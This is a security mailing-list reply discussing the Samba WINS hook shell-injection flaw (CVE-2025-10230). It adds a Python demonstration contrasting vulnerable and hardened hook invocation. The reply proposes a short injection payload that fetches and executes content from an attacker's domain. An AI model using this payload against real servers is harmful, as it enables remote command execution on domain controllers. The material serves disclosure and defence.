oss-sec mailing list archives

RE: Samba security releases for CVE-2025-10230 and CVE-2025-9640


From: "Caveney, Seamus G" <sgcaveney () seattleschools org>
Date: Wed, 15 Oct 2025 23:30:49 +0000

-----Original Message-----
From: Douglas Bagnall <douglas.bagnall () catalyst net nz> 
Sent: Wednesday, October 15, 2025 11:51 AM
To: oss-security () lists openwall com
Subject: [oss-security] Samba security releases for CVE-2025-10230 and CVE-2025-9640

[snip]

If a Samba server has WINS support enabled (it is off by default), and it has a 'wins hook' parameter specified, the
program specified by that parameter will be run whenever a WINS name is changed.
The WINS server used by the Samba Active Directory Domain Controller did not validate the names passed to the wins
hook program, and it passed them by inserting them into a string run by a shell.
WINS is an obsolete and trusting protocol, and clients can request any name that fits within the 15 character NetBIOS
limit. This includes some shell metacharacters, making it possible to run arbitrary commands on the host.
The WINS server used by Samba when it is not a domain controller is unaffected.

Illegal characters in a NetBIOS hostname are:

\ / : * ? " < > | ,

notably excluding backticks and semicolons. I'm not deeply familiar with the Samba code base but a glance at nbtname.c
and winsserver.c seems to suggest that those character limitations aren't enforced at the protocol level, so it might be
possible to use pipes, redirects or exec a local binary with a short path. Otherwise, the easiest exploitable payload I
can think of would be:

;`curl ab.cd`;

which fits the restrictions at only 14 characters (replace with your favourite short-named download tool that writes to
STDOUT by default - looks like RHEL-likes are one of the few distros still shipping /usr/bin/GET as part of perl LWP).
Requiring an attacker to own a 2-3 letter domain on a 2-3 letter TLD limits the attack surface quite a bit but it isn't
unheard of. I'd be interested to see if anybody has a living Samba install configured as a DC with WINS still running in
2025.
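As an added illustration of the bug class the thread is discussing (this is example code, not Samba's code or anything posted by either author): a WINS name that satisfies the NetBIOS host-name rules quoted above can still carry `;` and backticks, and a hook invoked by interpolating that name into a shell command line runs whatever the name contains. The function names, the `echo` stand-in for the hook program, the sample name/type/TTL/address values and the payload `;echo INJECTED;` (15 characters, so within the NetBIOS limit) are all constructed for this example; the argument layout (operation, name, name type, TTL, addresses) is only a loose approximation of what a wins hook receives and is not taken from the Samba source.

```python
import shlex
import subprocess

# Characters the message lists as illegal in a NetBIOS host name.
# Note that ';', backticks, '$', '(' and ')' are NOT in this set.
NETBIOS_ILLEGAL = set('\\/:*?"<>|,')
NETBIOS_MAX_LEN = 15


def passes_netbios_name_rules(name: str) -> bool:
    """True if the name fits in 15 characters and avoids the illegal set.

    This is the naming rule, not a shell-safety check: a name can pass
    here and still contain shell metacharacters.
    """
    return len(name) <= NETBIOS_MAX_LEN and not (set(name) & NETBIOS_ILLEGAL)


def _argv(hook: str, op: str, name: str, name_type: int, ttl: int, addrs):
    # Hypothetical argument layout for this example (operation, name,
    # two-hex-digit name type, TTL, address list); not Samba's exact one.
    return [hook, op, name, f"{name_type:02x}", str(ttl), *addrs]


def run_hook_vulnerable(hook, op, name, name_type, ttl, addrs) -> str:
    """The pattern the advisory describes: the untrusted name is pasted
    into a string and the string is handed to a shell.  A name such as
    ';echo INJECTED;' turns into three shell commands.  Returns stdout."""
    cmd = " ".join(_argv(hook, op, name, name_type, ttl, addrs))
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    # With the payload above the trailing 'NN TTL ADDR' becomes a failed
    # third command; its error goes to stderr and is ignored here.
    return proc.stdout


def run_hook_quoted(hook, op, name, name_type, ttl, addrs) -> str:
    """If a shell really is unavoidable, every attacker-influenced token
    must be quoted for it.  shlex.quote wraps the name in single quotes
    so the shell treats ';' and backticks as literal characters."""
    cmd = " ".join(shlex.quote(a) for a in _argv(hook, op, name, name_type, ttl, addrs))
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def run_hook_hardened(hook, op, name, name_type, ttl, addrs) -> str:
    """Preferred fix: no shell at all.  The hook is exec'd with an argv,
    so the name reaches it as one argument regardless of its contents."""
    proc = subprocess.run(_argv(hook, op, name, name_type, ttl, addrs),
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Constructed sample values; 'echo' stands in for the hook program so
    # the effect of each invocation style is visible on stdout.
    hook, op, name_type, ttl, addrs = "echo", "add", 0x20, 3600, ["192.0.2.10"]
    for name in [";`curl ab.cd`;", ";echo INJECTED;", "BAD:NAME"]:
        print(f"{name!r}: passes NetBIOS name rules = {passes_netbios_name_rules(name)}")
    payload = ";echo INJECTED;"
    print("vulnerable:", repr(run_hook_vulnerable(hook, op, payload, name_type, ttl, addrs)))
    print("quoted:    ", repr(run_hook_quoted(hook, op, payload, name_type, ttl, addrs)))
    print("hardened:  ", repr(run_hook_hardened(hook, op, payload, name_type, ttl, addrs)))
```

The 14-character payload from the message passes the naming rules unchanged, and the vulnerable path prints `add` and `INJECTED` as separate commands, whereas both the quoted and the exec-without-shell paths hand the hook a single literal argument. Of the two fixes, the argv form is the one to prefer: it has no quoting rules to get wrong.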
